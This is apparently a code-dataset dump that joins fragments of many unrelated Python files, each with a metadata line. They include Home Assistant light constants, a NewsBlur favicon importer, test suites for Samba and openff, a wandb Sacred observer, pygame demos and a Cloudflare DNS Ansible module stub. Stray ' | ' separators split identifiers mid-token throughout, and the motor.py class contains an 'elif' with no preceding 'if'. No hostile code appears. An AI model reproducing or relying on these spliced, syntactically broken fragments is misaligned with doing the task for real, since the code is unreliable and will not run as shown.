if not entry.capabilities:
return None
return entry.capabilities.get(ATTR_SUPPORTED_COLOR_MODES)
# Float that represents transition time in seconds to make change.
ATTR_TRANSITION = "transition"
# Lists holding color values
ATTR_RGB_COLOR = "rgb_color"
ATTR_RGBW_COLOR = "rgbw_color"
ATTR_RGBWW_COLOR = "rgbww_color"
ATTR_XY_COLOR = "xy_color"
ATTR_HS_COLOR = "hs_color"
ATTR_COLOR_TEMP = "color_temp"
ATTR_KELVIN = "kelvin"
ATTR_MIN_MIREDS = "min_mireds"
ATTR_MAX_MIREDS = "max_mireds"
ATTR_COLOR_NAME = "color_name"
ATTR_WHITE_VALUE = "white_value"
ATTR_WHITE = "white"
# Brightness of the light, 0..255 or percentage
ATTR_BRIGHTNESS = "brightness"
ATTR_BRIGHTNESS_PCT = "brightness_pct"
ATTR_BRIGHTNESS_STEP = "brightness_step"
ATTR_BRIGHTNESS_STEP_PCT = "brightness_step_pct"
# String representing a profile (built-in ones or external defined).
ATTR_PROFILE = "profile"
# If the light should flash, can be FLASH_SHORT or FLASH_LONG.
ATTR_FLASH = "flash"
FLASH_SHORT = "short"
FLASH_LONG = "long"
# List of possible effects
ATTR_EFFECT_LIST = "effect_list"
# Apply an effect to the light, can be EFFECT_COLORLOOP.
ATTR_EFFECT = "effect"
EFFECT_COLORLOOP = "colorloop"
EFFECT_RANDOM = "random"
EFFECT_WHITE = "white"
COLOR_GROUP = "Color descriptors"
LIGHT_PROFILES_FILE = "light_profiles.csv"
# Service call validation schemas
VALID_TRANSITION = vol.All(vol.Coerce(float), vol.Clamp(min=0, max=6553))
VALID_BRIGHTNESS = vol.All(vol.Coerce(int), vol.Clamp(min=0, max=255))
VALID_BRIGHTNESS_PCT = vol.All(vol.Coerce(float), vol.Range(min=0, max=100))
VALID_BRIGHTNESS_STEP = vol.All(vol.Coerce(int), vol.Clamp(min=-255, max=255))
VALID_BRIGHTNESS_STEP_PCT = vol.All(vol.Coerce(float), vol.Clamp(min=-100, max=100))
VALID_FLASH = vol.In([FLASH_SHORT, FLASH_LONG])
LIGHT_TURN_ON_SCHEMA = {
vol.Exclusive(ATTR_PROFILE, COLOR_GROUP): cv.string,
ATTR_TRANSITION: VALID_TRANSITION,
vol.Exclusive(ATTR_BRIGHTNESS, ATTR_BRIGHTNESS): VALID_BRIGHTNESS,
vol.Exclusive(ATTR_BRIGHTNESS_PCT, ATTR_BRIGHTNESS): VALID_BRIGHTNESS_PCT,
vol.Exclusive(ATTR_BRIGHTNESS_STEP, ATTR_BRIGHTNESS): VALID_BRIGHTNESS_STEP,
vol.Exclusive(ATTR_BRIGHTNESS_STEP_PCT, ATTR_BRIGHTNESS): VALID_BRIGHTNESS_STEP_PCT,
vol.Exclusive(ATTR_COLOR_NAME, COLOR_GROUP): cv.string,
vol.Exclusive(ATTR_COLOR_TEMP, COLOR_GROUP): vol.All(
vol.Coerce(int), vol.Range(min=1)
),
vol.Exclusive(ATTR_KELVIN, COLOR_GROUP): cv.positive_int,
vol.Exclusive(ATTR_HS_COLOR, COLOR_GROUP): vol.All(
vol.ExactSequence(
(
vol.All(vol.Coerce(float), vol.Range(min=0, max=360)),
vol.All(vol.Coerce(float), vol.Range(min=0, max=100)),
)
),
vol.Coerce(tuple),
),
vol.Exclusive(ATTR_RGB_COLOR, COLOR_GROUP): vol.All(
vol.ExactSequence((cv.byte,) * 3), vol.Coerce(tuple)
),
vol.Exclusive(ATTR_RGBW_COLOR, COLOR_GROUP): vol.All(
vol.ExactSequence((cv.byte,) * 4), vol.Coerce(tuple)
),
vol.Exclusive(ATTR_RGBWW_COLOR, COLOR_GROUP): vol.All(
vol.ExactSequence((cv.byte,) * 5), vol.Coerce(tuple)
),
vol.Exclusive(ATTR_XY_COLOR, COLOR_GROUP): vol.All(
vol.ExactSequence((cv.small_float, cv.small_float)), vol.Coerce(tuple)
),
vol.Exclusive(ATTR_WHITE, COLOR_GROUP): VALID_BRIGHTNESS,
ATTR_WHITE_VALUE: vol.All(vo | l.Coerce(int), vol.Range(min=0, max=255)),
ATTR_FLASH: VALID_FLASH,
ATTR_EFFECT: cv.string,
}
LIGHT_TURN_OFF_SCHEMA = {ATTR_TRANSITION: VALID_TR | ANSITION, ATTR_FLASH: VALID_FLASH}
_LOGGER = logging.getLogger(__name__)
@bind_hass
def is_on(hass: HomeAssistant, entity_id: str) -> bool:
"""Return if the lights are on based on the statemachine."""
return hass.states.is_state(entity_id, STATE_ON)
def preprocess_turn_on_alternatives(hass, params):
"""Process extra data for turn l |
mihaip/NewsBlur | apps/rss_feeds/icon_importer.py | Python | mit | 13,810 | 0.001593 | import urllib2
import lxml.html
import numpy
import scipy
import scipy.misc
import scipy.cluster
import urlparse
import struct
import operator
import gzip
import datetime
import requests
import httplib
from PIL import BmpImagePlugin, PngImagePlugin, Image
from socket import error as SocketError
from boto.s3.key import Key
from StringIO import StringIO
from django.conf import settings
from apps.rss_feeds.models import MFeedPage, MFeedIcon
from utils import log as logging
from utils.feed_functions import timelimit, TimeoutError
from OpenSSL.SSL import Error as OpenSSLError
from pyasn1.error import PyAsn1Error
from requests.packages.urllib3.exceptions import LocationParseError
class IconImporter(object):
def __init__(self, feed, page_data=None, force=False):
self.feed = feed
self.force = force
self.page_data = page_data
self.feed_icon = MFeedIcon.get_feed(feed_id=self.feed.pk)
def save(self):
if not self.force and self.feed.favicon_not_found:
# print 'Not found, skipping...'
return
if (
not self.force
and not self.feed.favicon_not_found
and self.feed_icon.icon_url
and self.feed.s3_icon
):
# print 'Found, but skipping...'
return
image, image_file, icon_url = self.fetch_image_from_page_data()
if not image:
image, image_file, icon_url = self.fetch_image_from_path(force=self.force)
if image:
image = self.normalize_image(image)
try:
color = self.determine_dominant_color_in_image(image)
except IndexError:
return
try:
image_str = self.string_from_image(image)
except TypeError:
return
if len(image_str) > 500000:
image = None
if (image and
(self.force or
self.feed_icon.data != image_str or
self.feed_icon.icon_url != icon_url or
self.feed_icon.not_found or
(settings.BACKED_BY_AWS.get('icons_on_s3') and not self.feed.s3_icon))):
logging.debug(" ---> [%-30s] ~SN~FBIcon difference:~FY color:%s (%s/%s) data:%s url:%s notfound:%s no-s3:%s" % (
self.feed.log_title[:30],
self.feed_icon.color != color, self.feed_icon.color, color,
self.feed_icon.data != image_str,
self.feed_icon.icon_url != icon_url,
self.feed_icon.not_found,
settings.BACKED_BY_AWS.get('icons_on_s3') and not self.feed.s3_icon))
self.feed_icon.data = image_str
self.feed_icon.icon_url = icon_url
self.feed_icon.color = color
self.feed_icon.not_found = False
self.feed_icon.save()
if settings.BACKED_BY_AWS.get('icons_on_s3'):
self.save_to_s3(image_str)
if self.feed.favicon_color != color:
self.feed.favicon_color = color
self.feed.favicon_not_found = False
self.feed.save(update_fields=['favicon_color', 'favicon_not_found'])
if not image:
self.feed_icon.not_found = True
self.feed_icon.save()
self.feed.favicon_not_found = True
self.feed.save()
return not self.feed.favicon_not_found
def save_to_s3(self, image_str):
expires = datetime.datetime.now() + datetime.timedelta(days=60)
expires = expires.strftime("%a, %d %b %Y %H:%M:%S GMT")
k = Key(settings.S3_CONN.get_bucket(settings.S3_ICONS_BUCKET_NAME))
k.key = self.feed.s3_icons_key
k.set_metadata('Content-Type', 'image/png')
k.set_metadata('Expires', expires)
k.set_contents_from_string(image_str.decode('base64'))
k.set_acl('public-read')
self.feed.s3_icon = True
self.feed.save()
def load_icon(self, image_file, index=None):
'''
DEPRECATED
Load Windows ICO image.
See http://en.wikipedia.org/w/index.php?oldid=264332061 for file format
description.
Cribbed and modified from http://djangosnippets.org/snippets/1287/
'''
try:
image_file.seek(0)
header = struct.unpack('<3H', image_file.read(6))
except Exception, e:
return
# Check magic
if header[:2] != (0, 1):
return
# Collect icon directories
directories = []
for i in xrange(header[2]):
directory = list(struct.unpack('<4B2H2I', image_file.read(16)))
for j in xrange(3):
if not directory[j]:
directory[j] = 256
directories.append(directory)
if index is None:
# Select best icon
directory = max(directories, key=operator.itemgetter(slice(0, 3)))
else:
directory = directories[in | dex]
# Seek to the bitmap data
image_file.seek(directory[7])
prefix = image_file.read(16)
image_file.seek(-16, 1)
if PngImagePlugin._accept(prefix):
# Windows Vista icon with PNG inside
try:
image = PngImagePlugin.PngImageFile(image_file)
exce | pt IOError:
return
else:
# Load XOR bitmap
try:
image = BmpImagePlugin.DibImageFile(image_file)
except IOError:
return
if image.mode == 'RGBA':
# Windows XP 32-bit color depth icon without AND bitmap
pass
else:
# Patch up the bitmap height
image.size = image.size[0], image.size[1] >> 1
d, e, o, a = image.tile[0]
image.tile[0] = d, (0, 0) + image.size, o, a
# Calculate AND bitmap dimensions. See
# http://en.wikipedia.org/w/index.php?oldid=264236948#Pixel_storage
# for description
offset = o + a[1] * image.size[1]
stride = ((image.size[0] + 31) >> 5) << 2
size = stride * image.size[1]
# Load AND bitmap
image_file.seek(offset)
string = image_file.read(size)
mask = Image.frombytes('1', image.size, string, 'raw',
('1;I', stride, -1))
image = image.convert('RGBA')
image.putalpha(mask)
return image
def fetch_image_from_page_data(self):
image = None
image_file = None
if self.page_data:
content = self.page_data
elif settings.BACKED_BY_AWS.get('pages_on_s3') and self.feed.s3_page:
key = settings.S3_CONN.get_bucket(settings.S3_PAGES_BUCKET_NAME).get_key(self.feed.s3_pages_key)
compressed_content = key.get_contents_as_string()
stream = StringIO(compressed_content)
gz = gzip.GzipFile(fileobj=stream)
try:
content = gz.read()
except IOError:
content = None
else:
content = MFeedPage.get_data(feed_id=self.feed.pk)
url = self._url_from_html(content)
if not url:
try:
content = requests.get(self.cleaned_feed_link).content
url = self._url_from_html(content)
except (AttributeError, SocketError, requests.ConnectionError,
requests.models.MissingSchema, requests.sessions.InvalidSchema,
requests.sessions.TooManyRedirects,
requests.models.InvalidURL,
requests.models.ChunkedEncodingError,
requests.models.ContentDecodingError,
httplib.IncompleteRead,
LocationParseError, OpenSSLError, PyAsn1Error,
ValueError), e:
logging.debug(" ---> ~SN~FRFailed~FY to |
motobyus/moto | module_django/jstest/manage.py | Python | mit | 804 | 0 | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os | .environ.setdefault("DJANGO_SETTINGS_MODULE", "jstest.settings")
try:
from django.core.management import execute_from_command_line
except ImportError:
# The above import may fail for some other reason. Ensure that the
# issue is really that Django is missing to avoid masking other
# exceptio | ns on Python 2.
try:
import django
except ImportError:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
raise
execute_from_command_line(sys.argv)
|
mlwbarlow/scripts-as-required | python/TypeSubjectFromRIFCS.py | Python | gpl-2.0 | 1,871 | 0.005879 | # TypeSubjectFromRIFCS.py takes input xml in RIFCS format and outputs subjectType and subjectText to .csv file per line as:
# subjectType|subjectText
#
#
#Usage: TypeSubjectFromRIFCS.py [options] arg1
#
#Options:
# -h, --help show this help message and exit
# --input_xml=INPUT_XML
# e.g ExampleRIFCS.xml - xml in RIFCS format
import os
import string
from types import *
from optparse import OptionParser
from xml.etree import ElementTree as ET
from xml.etree.ElementTree import parse
def openFile(fileName, mode):
file = open(("output/"+fileName), mode)
if file is None:
print("Unable to open file %s for %s" % (fileName, mode))
os.sys.ex | it(-1)
print("Opened file %s for %s" % (fileName, mode)) |
return file
usage = "usage: %prog [options] arg1"
parser = OptionParser(usage=usage)
parser.add_option("--input_xml", action="store", dest="input_xml", help="e.g ExampleRIFCS.xml - xml in RIFCS format")
(options, args) = parser.parse_args()
# Validate options
if not options.input_xml:
parser.error("Requires input_xml. Try --help for usage")
sys.exit(-1)
assert(options.input_xml.count(".") > 0) # expect a . in a file name
outputFileName = ("Subjects.csv")
outputCSV_FILE = openFile(outputFileName, "w")
elementTree = ET.parse(options.input_xml)
assert(elementTree is not None)
namespace = "{http://ands.org.au/standards/rif-cs/registryObjects}"
#allSubjects = elementTree.findall('.//{0}subject'.format(namespace))
allSubjects = list(elementTree.iterfind('.//{0}subject'.format(namespace)))
assert(len(allSubjects) > 0)
for subject in allSubjects:
print("%s|%s" % (subject.get("type", ""), subject.text))
outputCSV_FILE.write("%s|%s\n" % (subject.get("type", ""), subject.text))
outputCSV_FILE.close()
print("See output//%s for output" % outputFileName)
|
wandb/client | wandb/integration/sacred/__init__.py | Python | mit | 5,783 | 0.002959 | import warnings
import numpy
from sacred.dependencies import get_digest
from sacred.observers import RunObserver
import wandb
class WandbObserver(RunObserver):
"""Logs sacred experiment data to W&B.
Arguments:
Accepts all the arguments accepted by wandb.init()
name — A display name for this run, which shows up in the UI and is editable, doesn't have to be unique
notes — A multiline string description associated with the run
config — a dictionary-like object to set as initial config
project — the name of the project to which this run will belong
tags — a list of strings to associate with this run as tags
dir — the path to a directory where artifacts will be written (default: ./wandb)
entity — the team posting this run (default: your username or your default team)
job_type — the type of job you are logging, e.g. eval, worker, ps (default: training)
save_code — save the main python or notebook file to wandb to enable diffing (default: editable from your settings page)
group — a string by which to group other runs; see Grouping
reinit — whether to allow multiple calls to wandb.init in the same process (default: False)
id — A unique ID for this run primarily used for Resuming. It must be globally unique, and if you delete a run you can't reuse the ID. Use the name field for a descriptive, useful name for the run. The ID cannot contain special characters.
resume — if set to True, the run auto resumes; can also be a unique string for manual resuming; see Resuming (default: False)
anonymous — can be "allow", "never", or "must". This enables or explicitly disables anonymous logging. (default: never)
force — whether to force a user to be logged into wandb when running a script (default: False)
magic — (bool, dict, or str, optional): magic configuration as bool, dict, json string, yaml filename. If set to True will attempt to auto-instrument your script. (default: None)
sync_tensorboard — A boolean indicating whether or not copy all TensorBoard logs wandb; see Tensorboard (default: False)
monitor_gym — A boolean indicating whether or not to log videos generated by OpenAI Gym; see Ray Tune (default: False)
allow_val_change — whether to allow wandb.config values to change, by default we throw | an exception if config values are overwritten. (default: False)
Examples:
Create sacred experiment::
from wandb.sacred import WandbObserver
ex.observers.append(WandbObserver(project='sacred_test',
name='test1'))
@ex.config
def cfg():
C = 1.0
gamma = 0.7
@ex.automain
def run(C, gamma, | _run):
iris = datasets.load_iris()
per = permutation(iris.target.size)
iris.data = iris.data[per]
iris.target = iris.target[per]
clf = svm.SVC(C, 'rbf', gamma=gamma)
clf.fit(iris.data[:90],
iris.target[:90])
return clf.score(iris.data[90:],
iris.target[90:])
"""
def __init__(self, **kwargs):
self.run = wandb.init(**kwargs)
self.resources = {}
def started_event(
self, ex_info, command, host_info, start_time, config, meta_info, _id
):
"""
TODO:
* add the source code file
* add dependencies and metadata
"""
self.__update_config(config)
def completed_event(self, stop_time, result):
if result:
if not isinstance(result, tuple):
result = (
result,
) # transform single result to tuple so that both single & multiple results use same code
for i, r in enumerate(result):
if isinstance(r, float) or isinstance(r, int):
wandb.log({"result_{}".format(i): float(r)})
elif isinstance(r, dict):
wandb.log(r)
elif isinstance(r, object):
artifact = wandb.Artifact("result_{}.pkl".format(i), type="result")
artifact.add_file(r)
self.run.log_artifact(artifact)
elif isinstance(r, numpy.ndarray):
wandb.log({"result_{}".format(i): wandb.Image(r)})
else:
warnings.warn(
"logging results does not support type '{}' results. Ignoring this result".format(
type(r)
)
)
def artifact_event(self, name, filename, metadata=None, content_type=None):
if content_type is None:
content_type = "file"
artifact = wandb.Artifact(name, type=content_type)
artifact.add_file(filename)
self.run.log_artifact(artifact)
def resource_event(self, filename):
"""
TODO: Maintain resources list
"""
if filename not in self.resources:
md5 = get_digest(filename)
self.resources[filename] = md5
def log_metrics(self, metrics_by_name, info):
for metric_name, metric_ptr in metrics_by_name.items():
for _step, value in zip(metric_ptr["steps"], metric_ptr["values"]):
if isinstance(value, numpy.ndarray):
wandb.log({metric_name: wandb.Image(value)})
else:
wandb.log({metric_name: value})
def __update_config(self, config):
for k, v in config.items():
self.run.config[k] = v
self.run.config["resources"] = []
|
Zentyal/samba | selftest/run.py | Python | gpl-3.0 | 4,316 | 0.001622 | #!/usr/bin/python -u
# Bootstrap Samba and run a number of tests against it.
# Copyright (C) 2012 Jelmer Vernooij <jelmer@samba.org>
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""Test command running."""
import datetime
import os
import subprocess
from samba import subunit
from iso8601 import iso8601
import sys
import tempfile
import warnings
# expand strings from %ENV
def expand_environment_strings(s, vars):
# we use a reverse sort so we do the longer ones first
for k in sorted(vars.keys(), reverse=True):
v = vars[k]
s = s.replace("$%s" % k, v)
return s
def expand_command_list(cmd):
if not "$LISTOPT" in cmd:
return None
return cmd.replace("$LISTOPT", "--list")
def expand_command_run(cmd, supports_loadfile, supports_idlist, subtests=None):
"""Expand a test command.
:param cmd: Command to expand
:param supports_loadfile: Whether command supports loadfile
:param supports_idlist: Whether the command supports running specific
subtests
:param subtests: List of subtests to run - None for all subtests
:return: Tuple with command to run and temporary file to remove after
running (or None)
"""
# Generate a file with the individual tests to run, if the
# test runner for this test suite supports it.
if subtests is None:
return (cmd.replace("$LOADLIST", ""), None)
if supports_loadfile:
(fd, listid_file) = tempfile.mkstemp()
f = os.fdopen(fd, 'w')
try:
for test in subtests:
f.write(test+"\n")
finally:
f.close()
return (
cmd.replace("$LOADLIST", "--load-list=%s" % listid_file),
listid_file)
elif supports_idlist:
cmd += " " + " ".join(subtests)
return (cmd, None)
else:
warnings.warn(
"Running subtests requested, but command does not support "
"this.")
return (cmd, None)
def exported_envvars_str(vars, names):
out = ""
for n in names:
if not n in vars:
continue
out += "%s=%s\n" % (n, vars[n])
return out
def now():
"""Return datetime instance for current time in UTC.
"""
return datetime.datetime.utcnow().replace(tzinfo=iso8601.Utc())
def run_testsuite_command(name, cmd, subunit_ops, env=None, outf=None):
"""Run a testsuite command.
:param name: | Name of the testsuite
:param cmd: Command to run
:param subunit_ops: Subunit ops to use for reporting results
:param env: Environment the test is run in
:param outf: File-like object to write standard out to (defaults to sys.stdout)
:return: Exit code or None if the test failed to run completely
"""
if outf is None:
outf = sys.stdout
subunit_ops.start_testsuite(name)
subunit_ops.progress(None, subunit.PROGRESS_PUSH)
subunit_ops.time(now())
try | :
exitcode = subprocess.call(cmd, shell=True, stdout=outf)
except Exception, e:
subunit_ops.time(now())
subunit_ops.progress(None, subunit.PROGRESS_POP)
subunit_ops.end_testsuite(name, "error", "Unable to run %r: %s" % (cmd, e))
return None
subunit_ops.time(now())
subunit_ops.progress(None, subunit.PROGRESS_POP)
if env is not None:
envlog = env.get_log()
if envlog != "":
outf.write("envlog: %s\n" % envlog)
outf.write("command: %s\n" % cmd)
outf.write("expanded command: %s\n" % expand_environment_strings(cmd, os.environ))
if exitcode == 0:
subunit_ops.end_testsuite(name, "success")
else:
subunit_ops.end_testsuite(name, "failure", "Exit code was %d" % exitcode)
return exitcode
|
open-forcefield-group/openforcefield | openff/toolkit/tests/test_chemicalenvironment.py | Python | mit | 7,356 | 0.001631 | import pytest
from openff.toolkit.typing.chemistry import *
from openff.toolkit.utils.toolkits import OPENEYE_AVAILABLE
# TODO: Evaluate which tests in this file should be moved to test_toolkits
toolkits = []
if OPENEYE_AVAILABLE:
from openff.toolkit.utils.toolkits import OpenEyeToolkitWrapper, RDKitToolkitWrapper
toolkits.append("openeye")
toolkits.append(OpenEyeToolkitWrapper())
else:
from openff.toolkit.utils.toolkits import RDKitToolkitWrapper
toolkits.append("rdkit")
toolkits.append(RDKitToolkitWrapper())
class TestChemicalEnvironments:
def test_createEnvironments(self):
"""
Test all types of ChemicalEnvironment objects with defined atoms and bonds
Each will be tetrahedral carbons connected by ring single bonds
"""
carbon = [["#6"], ["X4"]]
singleBond = [["-"], ["@"]]
atom = AtomChemicalEnvironment("[#6X4:1]", "CT")
bond = BondChemicalEnvironment("[#6X4:1]-[#6X4:2]", "CT-CT")
angle = AngleChemicalEnvironment("[#6X4:1]-[#6X4:2]-[#6X4:3]", "CT-CT-CT")
torsion = TorsionChemicalEnvironment(
"[#6X4:1]-[#6X4:2]-[#6X4:3]-[#6X4:4]", "CT-CT-CT-CT"
)
improper = ImproperChemicalEnvironment(
"[#6X4:1]-[#6X4:2](-[#6X4:3])-[#6X4:4]", "CT-CT(-CT)-CT"
)
@pytest.mark.parametrize(
["smirks", "expected_valence", "expected_chemenv_class"],
[
["[#6](-[#1])-[#8]", None, ChemicalEnvironment],
["[#6&X4&H0:1](-[#1])-[#6&X4]", "Atom", AtomChemicalEnvironment],
["[#6&X4&H0:1](-[#1])-[#6&X4:2]", "Bond", BondChemicalEnvironment],
["[*:1]-[*:2](-[#6&X4])-[*:3]", "Angle", AngleChemicalEnvironment],
[
"[#6&X4&H0:1](-[#1])-[#6&X4:2]-[#6&X4&H0:3](-[#1])-[#6&X4:4]",
"ProperTorsion",
TorsionChemicalEnvironment,
],
[
"[#1:1]-[#6&X4:2](-[#8:3])-[#1:4]",
"ImproperTorsion",
ImproperChemicalEnvironment,
],
# Test that an improper smirks is also valid as a general ChemicalEnvironment
[
"[#1:1]-[#6&X4:2](-[#8:3])-[*:4](-[#6&H1])-[#8:5]",
None,
ChemicalEnvironment,
],
["[#6$(*~[#6]=[#8])$(*-,=[#7!-1,#8,#16,#7])]", None, ChemicalEnvironment],
["CCC", None, ChemicalEnvironment],
["[#6:1]1(-;!@[#1,#6])=;@[#6]-;@[#6]1", "Atom", ChemicalEnvironment],
["C(O-[#7,#8])CC=[*]", None, ChemicalEnvironment],
[
"[#6$([#6X4](~[#7!-1,#8!-1,#16!-1,#9,#17,#35,#53])(~[#8]~[#1])):1]-[#6X2H2;+0:2]-,=,:;!@;!#[#7!-1,#8,#16:3]-[#4:4]",
"ProperTorsion",
TorsionChemicalEnvironment,
],
[
"[#6$([#6X4](~[#7!-1,#8!-1,#16!-1,#9,#17,#35,#53])(~[#8]~[#1])):1]1=CCCC1",
"Atom",
AtomChemicalEnvironment,
],
[
"[*:1]-[#7X3:2](-[#6a$(*1ccc(-[#8-1X1])cc1):3])-[*:4]",
"ImproperTorsion",
ImproperChemicalEnvironment,
],
["[#6X4:1]1~[*:2]~[*$(*~[#1]):3]1", "Angle", AngleChemicalEnvironment],
["[$([#7]1~[#6]-CC1)]", None, ChemicalEnvironment],
["[$(c1ccccc1)]", None, ChemicalEnvironment],
# The next two tests are for ring-closing bonds
[
"[H][C@:4]1(C(C([C:3]([N:2]1[C:1](=O)C([H])([H])[H])([H])[H])([H])[H])([H])[H])C=O",
"ImproperTorsion",
ChemicalEnvironment,
],
["[P:1]=1=[P]=[P]=[P]=[P:2]=1", "Bond", BondChemicalEnvironment],
],
)
@pytest.mark.parametrize("toolkit", toolkits)
def test_parseSMIRKS(
self, t | oolkit, smirks, expected_valence, expected_chemenv_class
):
"""
Test creating environments with SMIRKS
"""
env = expected_chemenv_class(smirks=smirks, toolkit_regis | try=toolkit)
actual_type = env.get_type()
assert (
actual_type == expected_valence
), f"SMIRKS ({smirks}) classified as {actual_type} instead of {expected_valence} using {toolkit} toolkit"
@pytest.mark.parametrize(
("smirks", "wrong_envs"),
[
(
"[*]",
[
AtomChemicalEnvironment,
BondChemicalEnvironment,
AngleChemicalEnvironment,
TorsionChemicalEnvironment,
ImproperChemicalEnvironment,
],
),
(
"[*:1]",
[
BondChemicalEnvironment,
AngleChemicalEnvironment,
TorsionChemicalEnvironment,
ImproperChemicalEnvironment,
],
),
(
"[*:1]~[*:2]",
[
AtomChemicalEnvironment,
AngleChemicalEnvironment,
TorsionChemicalEnvironment,
ImproperChemicalEnvironment,
],
),
(
"[*:3]~[*:2]~[*:1]",
[
AtomChemicalEnvironment,
BondChemicalEnvironment,
TorsionChemicalEnvironment,
ImproperChemicalEnvironment,
],
),
(
"[*:1]~[*:2]~[*:3]~[*:4]",
[
AtomChemicalEnvironment,
BondChemicalEnvironment,
AngleChemicalEnvironment,
ImproperChemicalEnvironment,
],
),
(
"[*:1]~[*:2](~[*:3])~[*:4]",
[
AtomChemicalEnvironment,
BondChemicalEnvironment,
AngleChemicalEnvironment,
TorsionChemicalEnvironment,
],
),
(
"[*:1]~[*:2]~[*:3]~[*:4]~[*:5]",
[
AtomChemicalEnvironment,
BondChemicalEnvironment,
AngleChemicalEnvironment,
TorsionChemicalEnvironment,
ImproperChemicalEnvironment,
],
),
],
)
def test_creating_wrong_environments(self, smirks, wrong_envs):
"""
Test exceptions for making environments with the wrong smirks
"""
for wrong_env in wrong_envs:
with pytest.raises(SMIRKSMismatchError):
env = wrong_env(smirks)
@pytest.mark.parametrize("toolkit", toolkits)
def test_wrong_smirks_error(self, toolkit):
"""
Check that an imparseable SMIRKS raises errors
"""
smirks = "[*;:1]"
with pytest.raises(SMIRKSParsingError):
env = ChemicalEnvironment(smirks, toolkit_registry=toolkit)
def test_embedded_atoms_smirks(self):
"""
Check embedded atom parsing works
"""
smirks = "[#1$(*-[#6](-[#7,#8,#9,#16,#17,#35])-[#7,#8,#9,#16,#17,#35]):1]~[$([#1]~[#6])]"
env = ChemicalEnvironment(smirks)
|
google-research/robodesk | robodesk/robodesk_example.py | Python | apache-2.0 | 642 | 0 | """
Copyright 2021 Google L | LC
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of t | he License at
https://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import robodesk
env = robodesk.RoboDesk()
env.reset()
env.step([1, 0, 0, 0, 0])
|
RoboArmadillo/JSIM | motor.py | Python | gpl-2.0 | 1,123 | 0.015138 | import os,sys
import serial
import time
from websocket import create_connection
ws = create_connection("ws://echo.websocket.org/")
class Motor(object):
def __init__(self, which_motor, speed = 0):
global ser
self._speed = speed
if which_motor == 0:
self.motor_side = "left"
elif which_motor | ==1:
self.motor_side = "right"
@property
def speed(self):
return self._speed
@speed.setter
def speed(self, value):
self._speed = value
ws.send("1257, " + str(self.motor_side) +", "+ str(self._speed))
elif self._speed >100 or self._speed < -100:
print "1257 ERROR - Speed value out of Range"
sys.exit()
@speed.deleter
def speed(self):
del self._speed
'''
from websocket import create_connection
ws = create_connection("ws://echo.websocket.org/")
print "Sending 'Hello, World'..."
ws.send("Hello, World")
print "Sent"
print "Reeiving..."
result = ws.recv()
print "Received '%s'" % result
ws.close()
'''
| |
tidus747/Tutoriales_juegos_Python | Nociones PyGame/hola_mundo.py | Python | gpl-3.0 | 592 | 0.020305 | # -*- coding: utf-8 -*-
import pygame
pygame.init()
window = pygame.display.s | et_mode( (500, 400) )
while True:
pygame.draw.rect(window, (255, 0, 0), (100, 100, 100, 50), 2)
pygame.draw.ellipse(window, (255, 0, 0), (100, 100, 100, 50))
pygame.draw.rect(window, (0, 255, 0), (100, 150, 80, 40), 2)
pygame.draw | .ellipse(window, (0, 255, 0), (100, 150, 80, 40))
pygame.draw.rect(window, (0, 0, 255), (100, 190, 60, 30), 2)
pygame.draw.ellipse(window, (0, 0, 255), (100, 190, 60, 30))
#Círculo
pygame.draw.ellipse(window, (0, 0, 255), (100, 250, 40, 40))
pygame.display.update()
|
maartenq/ansible | lib/ansible/modules/net_tools/cloudflare_dns.py | Python | gpl-3.0 | 33,473 | 0.003256 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2016 Michael Gruener <michael.gruener@chaosmoon.net>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: cloudflare_dns
author: "Michael Gruener (@mgruener)"
requirements:
- "python >= 2.6"
version_added: "2.1"
short_description: manage Cloudflare DNS records
description:
- "Manages dns records via the Cloudflare API, see the docs: U(https://api.cloudflare.com/)"
options:
account_api_token:
description:
- >
Account API token. You can obtain your API key from the bottom of the Cloudflare 'My Account' page, found here: U(https://dash.cloudflare.com/)
required: true
account_email:
description:
- "Account email."
required: true
algorithm:
description:
- Algorithm number. Required for C(type=DS) and C(type=SSHFP) when C(state=present).
type: int
version_added: 2.7
cert_usage:
description:
- Certificate usage number. Required for C(type=TLSA) when C(state=present).
choices: [ 0, 1, 2, 3 ]
type: int
version_added: 2.7
hash_type:
description:
- Hash type number. Required for C(type=DS), C(type=SSHFP) and C(type=TLSA) when C(state=present).
choices: [ 1, 2 ]
type: int
version_added: 2.7
key_tag:
description:
- DNSSEC key tag. Needed for C(type=DS) when C(state=present).
type: int
version_added: 2.7
port:
description: Service port. Required for C(type=SRV) and C(type=TLSA).
priority:
description: Record priority. Required for C(type=MX) and C(type=SRV)
default: "1"
proto:
description:
- Service protocol. Required for C(type=SRV) and C(type=TLSA).
- Common values are tcp and udp.
- Before Ansible 2.6 only tcp and udp were available.
proxied:
description: Proxy through cloudflare network or just use DNS
type: bool
default: 'no'
version_added: "2.3"
record:
description:
- Record to add. Required if C(state=present). Default is C(@) (e.g. the zone name)
default: "@"
aliases: [ "name" ]
selector:
description:
- Selector number. Required for C(type=TLSA) when C(state=present).
choices: [ 0, 1 ]
type: int
version_added: 2.7
service:
description: Record service. Required for C(type=SRV)
solo:
description:
- Whether the record should be the only one for that record type and record name. Only use with C(state=present)
- This will delete all other records with the same record name and type.
state:
description:
- Whether the record(s) should exist or not
choices: [ 'present', 'absent' ]
default: present
timeout:
description:
- Timeout for Cloudflare API calls
default: 30
ttl:
description:
